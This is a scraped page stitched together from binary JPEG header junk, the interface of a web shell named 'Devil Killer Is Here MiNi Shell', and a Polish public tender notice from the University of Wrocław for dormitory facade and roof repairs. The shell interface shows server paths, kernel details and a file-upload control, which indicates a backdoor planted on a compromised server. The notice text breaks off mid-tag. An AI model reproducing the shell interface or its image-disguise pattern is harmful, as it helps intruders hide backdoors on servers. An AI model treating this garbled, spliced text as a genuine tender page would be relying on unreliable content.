JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20190624/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20190624/564130-N-2019.html

 <script type="text/javascript">//<![CDATA[//]]></script> <div> <style type="text/css"> .divRow_xforms { float: left; width: 100%; font-weight: normal; line-height: 30px; } .headerLarge_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: larger} .headerMedium_xforms { font-weight: bold; padding-top: 20px; padding-bottom: 20px; font-size: medium} .headerSmall_xforms { font-weight: bold; font-size: x-small;} .table_xforms { border-collapse: collapse; width: 900px; font-weight: normal} .table_xforms td { border: 2px solid black; border-collapse: collapse; padding: 5px;} .table_xforms th { border: 2px solid black; border-collapse: collapse; padding: 5px; font-weight: bold} @media print { .no-print, .no-print * { display: none !important; } } </style> <br /> <br /> <span id="ctl00_ContentPlaceHolder1_lblNumerOgloszenia">Ogłoszenie nr 564130-N-2019 z dnia 2019-06-24 r. </span> <br /> <br /> <div class="divRow_xforms"> <div class="headerMedium_xforms" style="text-align: center"> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc_h">Uniwersytet Wrocławski</span>: <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu_h">Remont elewacji i dachu w DS OŁÓWEK usytuowanym przy pl. Grunwaldzkim 30 we Wrocławiu</span><br/> OGŁOSZENIE O ZAMÓWIENIU - <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia_h">Roboty budowlane</span> </div> <div> <b>Zamieszczanie ogłoszenia:</b> <span id="ctl00_ContentPlaceHolder1_zamieszczanie_obowiazkowe">Zamieszczanie obowiązkowe</span> </div> <div> <b>Ogłoszenie dotyczy:</b> <span id="ctl00_ContentPlaceHolder1_ogloszenie_dotyczy">Zamówienia publicznego</span> </div> <div> <b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_finansowane_z_unii">Nie</span> </div> <br/> <b>Nazwa projektu lub programu</b> <br/> <span id="ctl00_ContentPlaceHolder1_nazwa_projektu_programu"></span> </div> <div> <b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_ubiegac_zaklady_pracy">Nie</span> </div> <br/> Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %) <br/> <span id="ctl00_ContentPlaceHolder1_minimalny_procent_zatrudnienia"></span> </div> <div class="headerLarge_xforms" style="text-align: left"> <u>SEKCJA I: ZAMAWIAJĄCY</u> </div> <div style="padding-left: 20px"> <b>Postępowanie przeprowadza centralny zamawiający </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_centralny_zamawiajacy">Nie</span> </div> <b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_podmiot_zamawiajacy_powierzyl">Nie</span> </div> <b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_powierzyl"></span> <br/> <b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_wspolnie">Nie</span> </div> <br/> Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów: <br/> <br/> <b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b> <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_przeprowadza_zamawiajacy_z_eu">Nie</span> </div> <b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej - mające zastosowanie krajowe prawo zamówień publicznych:</b> <span id="ctl00_ContentPlaceHolder1_postepowanie_wspolne_tresc"></span> <br/> <b>Informacje dodatkowe:</b> <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_zamawiajacy"></span> <br/> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b>I. 1) NAZWA I ADRES: </b> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_nazwa">Uniwersytet Wrocławski</span>, krajowy numer identyfikacyjny <span id="ctl00_ContentPlaceHolder1_regon">13010000000000</span>, ul. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_ulica">pl. Uniwersytecki</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_domu">1</span> <span id="ctl00_ContentPlaceHolder1_zamawiajacy_adres_numer_mieszkania"></span> , <span id="ctl00_ContentPlaceHolder1_zamawiajacy_kod_pocztowy">50-137</span>&#160; <span id="ctl00_ContentPlaceHolder1_zamawiajacy_miejscowosc">Wrocław</span>, woj. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_wojewodztwo">dolnośląskie</span>, państwo <span id="ctl00_ContentPlaceHolder1_zamawiajacy_panstwo">Polska</span>, tel. <span id="ctl00_ContentPlaceHolder1_zamawiajacy_telefon">71 375 22 34</span>, e-mail <span id="ctl00_ContentPlaceHolder1_zamawiajacy_email">bzp@uwr.edu.pl</span>, faks <span id="ctl00_ContentPlaceHolder1_zamawiajacy_fax">71 375 24 72</span>. <br/> Adres strony internetowej (URL): <span id="ctl00_ContentPlaceHolder1_adres_strony_url">www.uni.wroc.pl</span> <br/> Adres profilu nabywcy: <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej"></span> <br/> Adres strony internetowej pod którym można uzyskać dostęp do narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne <span id="ctl00_ContentPlaceHolder1_adres_strony_internetowej_narzedzia"></span> </div> <div style="text-align: left"> <b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego">Inny (proszę określić):</span> <br /> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamawiajacego_inny">uczelnia publiczna</span> </div> <div style="text-align: left"> <b> I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>: </b> <div style="padding-left: 20px"> Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających): <br/> <span id="ctl00_ContentPlaceHolder1_wspolne_udzielanie_zamowienia"></span> </div> </div> <div style="text-align: left"> <b> I.4) KOMUNIKACJA: </b> <br/> <b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_dokumentow_zamowienia">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_dokumentow_zamowienia">www.bip.uni.wroc.p</span> </div> <br/> <b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_zamieszczona_bedzie_specyfikacja">Tak</span> <br/> <span id="ctl00_ContentPlaceHolder1_zamieszczona_bedzie_specyfikacja">www.bip.uni.wroc.pl</span> </div> <br/> <b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_dostep_do_dokumentow_ograniczony">Nie</span> <br/> <span id="ctl00_ContentPlaceHolder1_dostep_do_dokumentow_ograniczony"></span> </div> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b> <br/> <b>Elektronicznie</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_oferty_wnioski_dostepne">Nie</span> <br/> adres <br/> <span id="ctl00_ContentPlaceHolder1_oferty_wnioski_dostepne"></span> </div> <br/> <div style="padding-left: 20px"> <b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_dopuszczone_wymagane_przeslanie_ofert">Nie</span> <br/> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_inny"></span> <br/> <b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b> <br/> <span id="ctl00_ContentPlaceHolder1_czy_wymagane_przeslanie_ofert">Tak</span> <br /> Inny sposób: <br/> <span id="ctl00_ContentPlaceHolder1_wymagane_przeslanie_ofert_inny">w formie pisemnej zgodnie z zasadami określonymi w SIWZ, rozdział X</span> <br/> Adres: <br/> <span id="ctl00_ContentPlaceHolder1_dopuszczone_wymagane_przeslanie_ofert_adres">Biuro Zamówień Publocznych Uniwersytetu Wrocławskiego, ul. Kuźnicza 49/55, pok. 100, 50-138 Wrocław</span> </div> <br/> <b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_komunikacja_elektroniczna_wymaga">Nie</span> <br/> Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL) <br/> <span id="ctl00_ContentPlaceHolder1_komunikacja_elektroniczna_wymaga"></span> </div> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA II: PRZEDMIOT ZAMÓWIENIA </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <br/> <b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b> <span id="ctl00_ContentPlaceHolder1_nazwa_nadana_zamowieniu">Remont elewacji i dachu w DS OŁÓWEK usytuowanym przy pl. Grunwaldzkim 30 we Wrocławiu</span> <br/> <b>Numer referencyjny: </b> <span id="ctl00_ContentPlaceHolder1_numer_referencyjny">BZP.2412.21.2019.JS</span> <br/> <b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b> <br/> <div style="padding-left: 20px; text-align: justify"> <span id="ctl00_ContentPlaceHolder1_czy_dialog_techniczny">Nie</span> </div> <br/> <b>II.2) Rodzaj zamówienia: </b> <span id="ctl00_ContentPlaceHolder1_rodzaj_zamowienia">Roboty budowlane</span> <br/> <b>II.3) Informacja o możliwości składania ofert częściowych</b> <br/> Zamówienie podzielone jest na części: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_czy_podzielone_na_czesci">Nie</span> <br/> <b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b> <br/> <span id="ctl00_ContentPlaceHolder1_oferty_lub_wnioski"></span> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci"></span> <br/> </div> <b>Zamawiający zastrzega sobie prawo do udzielenia łącznie następujących części lub grup części:</b> <br/> <span id="ctl00_ContentPlaceHolder1_zastrzega_prawo_grup_czesci"></span> <br/> <b>Maksymalna liczba części zamówienia, na które może zostać udzielone zamówienie jednemu wykonawcy:</b> <br/> <span id="ctl00_ContentPlaceHolder1_maksymalna_liczba_czesci_jednemu_wykonawcy"></span> <br/> <br/> <br/> <b> II.4) Krótki opis przedmiotu zamówienia </b> <i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane: </b> <span id="ctl00_ContentPlaceHolder1_okreslenie_przedmiotu">1.Przedmiotem zamówienia jest remont elewacji i dachu w DS OŁÓWEK usytuowanym przy pl.Grunwaldzkim 30 we Wrocławiu. Uwaga! Prace będą wykonywane w budynku czynnym 24h/dobę.Koszt montażu rusztowań należy ująć jako roboty pomocnicze w kosztach robót podstawowych. 1.1.Zadanie obejmuje niżej wymienione roboty: 1.1.1. Wymiana obróbek blacharskich stropodachu: a)Demontaż instalacji odgromowej, b) Demontaż obróbek blacharskich ścian attykowych na dachu, c)Wymiana instalacji odgromowej, d) Wykonanie obróbek blacharskich, 1.1.2. Remont podniebienia płytbalkonowych i posadzek loggi: a) Czyszczenie powierzchni betonu, b) Przygotowanie podłoża - kucieręczne powierzchni poziomych i pionowych na głębokość ok. 1 cm, wykucie ręczne odkrytych iskorodowanych prętów zbrojeniowych, ręczne oczyszczenie stali zbrojeniowej z korozji, zabezpieczenieantykorozyjne stali zbrojeniowej, c) Reprofilacja podłoża - wykonanie warstwy kontaktowej nakonstrukcji betonowej, ręczne wypełnienie ubytków, profilowanie naroży żelbetowych, ręczneszpachlowanie warstw naprawczych betonu, zabezpieczenie powłokowe powierzchni betonu, d)Przygotowanie powierzchni pod malowanie farbami emulsyjnymi, e) Jednokrotne malowanie farbamiemulsyjnymi elewacji, f) Naprawa pęknięć posadzki loggi z lastryko, 1.1.3. Remont ścian szczytowych:a) Odbicie tynków zewnętrznych, b) Oczyszczenie powierzchni murów, c) Uzupełnienie tynkówzewnętrznych cementowych i podkładów pod tynki, d) Malowanie elewacji farbą silikonową, 1.1.4.Wymiana obróbek blacharskich stolarki okiennej: a) demontaż obróbek blacharskich stolarki okiennej naostatniej kondygnacji, b) dopasowanie skrzydeł okiennych i drzwiowych zewnętrznych, balkonowych,zespolonych z uzupełnieniem piankowania, c) Wykonanie obróbek blacharskich. UWAGA: Robotypomocnicze/tymczasowe nie ujęte w przedmiarze robót, Wykonawca jest zobowiązany skalkulować(ująć) w wartościach robót podstawowych. Ponadto: 1. Wykonawca po zakończeniu robót budowlanychnaprawi wszelkie uszkodzenia powstałe w czasie prac, które nie były przewidziane do remontu, a uległyzabrudzeniu lub uszkodzeniu w trakcie remontu przez jego pracowników, 2. Usunięcie i wywóz gruzuoraz pozostałych materiałów z demontażu wraz z ich utylizacją oraz opłaty z tym związane ponosiWykonawca, 3. Wykonawca w trybie natychmiastowym usunie wszelkie szkody i awarie spowodowaneprzez niego w trakcie realizacji robót. 4. W chwili obecnej teren budowy jest zabezpieczony. Istniejemożliwość odpłatnego przejęcia, przez Wykonawcę, zabezpieczenia terenu. W tym celu należykontaktować się pod nr tel. 501 065 159. 5. W trakcie robót remontowych, objętych przedmiotemzamówienia, będą realizowane inne roboty remontowe. Wiąże się to z obecnością większej liczby firmwykonawczych na terenie obiektu. Zaleca się przeprowadzenie wizji lokalnej przez Wykonawcę w DS,,Ołówek", celem dokonania oceny potrzeb dla realizacji zamówienia. Osobą do kontaktu jest Kierownikobiektu Pani Marzena Szlosek-Starzak, tel. 71 328 32 12. 1.2. Szczegółowy zakres prac oraz warunki izasady realizacji zamówienia, zgodnie z którymi należy wykonać zamówienie, zawierają następującezałączniki do SIWZ: a) Opracowanie do zgłoszenia robót - załącznik nr 8 do SIWZ; b) Projektwykonawczy - załącznik nr 9 do SIWZ c) Specyfikacja Techniczna Wykonania i Odbioru RobótBudowlanych wraz z aneksem (STWiORB) - załącznik nr 10 do SIWZ; d) Przedmiar robót: - załączniknr 11 do SIWZ; e) Wzór umowy z załącznikami: Kartą Gwarancyjną - Załącznik nr 12 do SIWZ.</span> <br/> <br/> <b>II.5) Główny kod CPV: </b> <span id="ctl00_ContentPlaceHolder1_cpv_glowny_przedmiot">45453000-7</span> <br/> <b> Dodatkowe kody CPV:</b> <br/> <TABLE style='border: 1px solid black;border-collapse: collapse;'><TR><TD style='border: 1px solid black;border-collapse: collapse;'>Kod CPV</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262120-8</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45262110-5</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45421000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45410000-4</TD></TR><TR><TD style='border: 1px solid black;border-collapse: collapse;'>45453100-8</TD></TR></TABLE> <br /> <br /> <b> II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>: <br/> Wartość bez VAT: <span id="ctl00_ContentPlaceHolder1_szacunkowa_wartosc_zamowienia_calosc"></span> <br/> Waluta: <br/> <div style="padding-left: 20px"> <span id="ctl00_ContentPlaceHolder1_waluta_calosc"></span> <br/> <i>(w przypadku umów ramowych lub dynamicznego systemu zakupów - szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i> </div> <br/> <b> II.7) Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: </b> <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67">Nie</span> <br/> Określenie przedmiotu, wielkości lub zakresu oraz warunków na jakich zostaną udzielone zamówienia, o których mowa w art. 67 ust. 1 pkt 6 lub w art. 134 ust. 6 pkt 3 ustawy Pzp: <span id="ctl00_ContentPlaceHolder1_czy_przewiduje_udzielenie_zamowien_67_tekst"></span> <br/> <b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b> <br /> miesiącach:&#160; <span id="ctl00_ContentPlaceHolder1_okres_w_miesiacach"></span> &#160;<i> lub </i> <b> dniach:</b> <span id="ctl00_ContentPlaceHolder1_okres_w_dniach">100</span> <br /> <i>lub</i> <br /> <b> data rozpoczęcia: </b> <span id="ctl00_ContentPlaceHolder1_data_rozpoczecia"></span> &#160;<i> lub </i><b> zakończenia: </b> <span id="ctl00_ContentPlaceHolder1_data_zakonczenia"></span> <br /> <br/> <b>II.9) Informacje dodatkowe: </b> <span id="ctl00_ContentPlaceHolder1_informacje_na_temat_katalogow"></span> </div> </div> <div class="headerLarge_xforms" style="text-align: left"> <u> SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM </u> </div> <div style="padding-left: 20px;"> <div style="text-align: left"> <b> III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU </b> <br/> <div style="padding-left: 20px"> <b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_okreslenie_warunkow">Działalność prowadzona na potrzeby wykonania przedmiotu zamówienia niewymaga posiadania specjalnych uprawnień</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_informacje_dodatkowe_okreslenie_warunkow"></span> <br/> <b>III.1.2) Sytuacja finansowa lub ekonomiczna </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_okreslenie_warunkow">Zamawiający nie stawia warunków w ww. zakresie.Informacje dodatkowe</span> <br/> Informacje dodatkowe <span id="ctl00_ContentPlaceHolder1_sytuacja_finansowa_informacje_dodatkowe"></span> <br/> <b>III.1.3) Zdolność techniczna lub zawodowa </b> <br/> Określenie warunków: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_okreslenie_warunkow">1) Wykonawcy winni wykazać, że wykonali zgodnie z przepisami prawabudowlanego i prawidłowo ukończyli, w okresie ostatnich 5 lat przed upływem terminu składaniaofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie, co najmniej jedną robotębudowlaną o wartości nie mniejszej niż 100 000,00 zł brutto, obejmującą remont elewacji. Doprzeliczenia wartości występujących w innych walutach niż PLN Zamawiający jako kursprzeliczeniowy przyjmie średni kurs Narodowego Banku Polskiego (NBP), z dnia opublikowaniaogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, przy czym średnie kursy walutdostępne są pod następującym adresem internetowym: http://www.nbp.pl/home.aspx?f=/Kursy/kursy.html W przypadku Wykonawców wspólnie ubiegających się o udzielenie niniejszegozamówienia przez dwóch lub więcej Wykonawców, Zamawiający uzna wymagany warunek zaspełniony, jeżeli spełni go przynajmniej jeden z Wykonawców. 2) Wykonawca winien wykazać, żedysponuje lub będzie dysponować następującymi osobami posiadającymi uprawnienia dosprawowania samodzielnych funkcji technicznych w budownictwie, zgodnie z ustawą z dnia 7 lipca1994 r. - Prawo Budowlane (t. jedn. Dz. U. z 2018 r. poz. 1202) i Rozporządzeniem MinistraInfrastruktury i Rozwoju z dnia 11 września 2014 r. w sprawie samodzielnych funkcji technicznych wbudownictwie (Dz. U. z 2014 r., poz. 1278) lub odpowiadające im ważne uprawnienia budowlanewydane na podstawie wcześniej obowiązujących przepisów lub których odpowiednie kwalifikacjezawodowe zostały uznane na zasadach określonych w przepisach odrębnych: - kierownik budowy -posiadający uprawnienia budowlane do kierowania robotami budowlanymi w specjalnościkonstrukcyjno-budowlanej bez ograniczeń. W przypadku Wykonawców wspólnie ubiegających się oudzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, Zamawiający uznawymagany warunek za spełniony, jeżeli spełni go przynajmniej jeden z Wykonawców.</span> <br/> Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób: <span id="ctl00_ContentPlaceHolder1_czy_zdolnosc_techniczna_wymaga_wykonawcow">Nie</span> <br/> Informacje dodatkowe: <span id="ctl00_ContentPlaceHolder1_zdolnosc_techniczna_informacje_dodatkowe"></span> </div> <b> III.2) PODSTAWY WYKLUCZENIA </b> <br/> <div style="padding-left: 20px"> <b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1 ustawy Pzp</b> <br/> <b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b> <span id="ctl00_ContentPlaceHolder1_czy_zamawiajacy_przewiduje_wykluczenie">Tak</span> Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia: <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_1">Tak (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)</span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_2"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_3"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_4"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_5"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_6"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_7"></span> <br/> <span id="ctl00_ContentPlaceHolder1_art_24_ust_5_pkt_8"></span> <br/> </div> <b> III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI </b> <br/> <div style="padding-left: 20px"> <b> Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu </b> <br/> <span 